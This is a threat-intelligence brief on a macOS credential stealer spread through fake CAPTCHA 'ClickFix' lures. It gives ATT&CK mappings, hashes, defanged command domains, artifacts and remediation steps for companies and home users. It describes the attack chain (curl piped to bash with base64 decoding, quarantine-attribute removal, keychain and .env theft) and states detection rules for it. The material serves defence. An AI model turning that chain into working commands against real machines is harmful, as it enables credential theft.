Technical Analysis & Remediations
MITRE ATT&CK Mapping
T1204.002
User Execution: Malicious File (ClickFix CAPTCHA lures).
T1059.004
Command and Scripting Interpreter: Unix Shell (Initial Bash dropper).
T1140
Deobfuscate/Decode Files or Information (Base64 decoded curl commands).
T1555.001
Credentials from Password Stores: Keychain.
T1552
Unsecured Credentials: Plaintext secrets in developer files (.env).
CVE Profile
NVD Score: N/A (Social Engineering)
CISA KEV Status: Inactive.
The malware does not exploit a software vulnerability; it abuses legitimate macOS administrative utilities.
Telemetry
Hashes
MD5 (Dropper)
da73e42d1f9746065f061a6e85e28f0c
SHA256
(Stage-3 Payload)
1e63be724bf651bb17bcf181d11bacfabef6a6360dcdfda945d6389e80f2b958
Network (Refanged)
hxxps://update-check[.]com
(C2 / Payload Delivery)
hxxps://update-check[.]com/m/7d8df27d95d9 (Stage 1 Dropper)
hxxps://Infiniti-stealer[.]com
(Operator Panel)
Artifacts
Directory structures
/tmp/.2835b1b5098587a9XXXXXX
Debug Log
/tmp/.bs_debug.log
Packer Magic
4b 41 59 28 b5 2f fd
(Nuitka KAY + zstd compression)
The structure indicates execution evasion routines by checking for Sandbox environments (VMware, VirtualBox, any.run, Joe Sandbox, Hybrid Analysis).
Remediation - THE ENTERPRISE TRACK (NIST SP 800-61r3 / CSF 2.0)
GOVERN (GV) – Crisis Management & Oversight
Command
Initiate incident response protocols for potential credential compromise affecting developer environments and enterprise single sign-on (SSO) tokens.
DETECT (DE) – Monitoring & Analysis
Command
Deploy EDR hunting queries targeting Terminal execution of curl piped to bash explicitly containing base64 --decode logic.
Command
Alert on anomalous execution of xattr -dr com.apple.quarantine originating from /tmp directories.
RESPOND (RS) – Mitigation & Containment
Command
Isolate affected macOS endpoints from the corporate network immediately.
Command
Block domains update-check[.]com and Infiniti-stealer[.]com at the secure web gateway and DNS levels.
RECOVER (RC) – Restoration & Trust
Command
Force global password resets and revoke all active session tokens, SSH keys, and API tokens for affected users.
IDENTIFY & PROTECT (ID/PR) – The Feedback Loop
Command
Implement Endpoint Privilege Management (EPM) to restrict standard users from executing unapproved scripts in Terminal.
Command
Conduct security awareness training focusing specifically on ClickFix methodologies and fake CAPTCHA human-verification lures.
Remediation - THE HOME USER TRACK (Safety Focus)
Priority 1: Safety
Command
Disconnect the affected Mac from the internet immediately to halt ongoing data exfiltration.
Command
Do not log into banking, email, or cryptocurrency wallets from the compromised device until it is verified clean.
Priority 2: Identity
Command
Reset all critical passwords (Apple ID, banking, primary email) and ensure MFA is enabled using a known clean device (e.g., your smartphone on a cellular network).
Priority 3: Persistence
Command
Check /tmp/ for hidden files (e.g., .bs_debug.log) and audit ~/Library/LaunchAgents/ for unauthorized persistence mechanisms.
Command
Run a comprehensive scan using a reputable anti-malware solution designed for macOS to eradicate the Stage-2 and Stage-3 Nuitka payloads.
Hardening & References
Baseline
Apply CIS Apple macOS Benchmarks to restrict terminal execution policies and enforce strict Gatekeeper configurations.
Framework
NIST CSF 2.0 PR.AT-1 (Identity Management and Authentication) and PR.DS-1 (Data-at-rest protection for developer secrets).
Note
Native macOS binaries compiled via Nuitka bypass standard Python script detection. Detection engineering must focus on the behavioral execution chain (Terminal -> curl -> /tmp execution) rather than static file analysis alone.
Source
Malwarebytes Threat Intelligence
www.malwarebytes.com
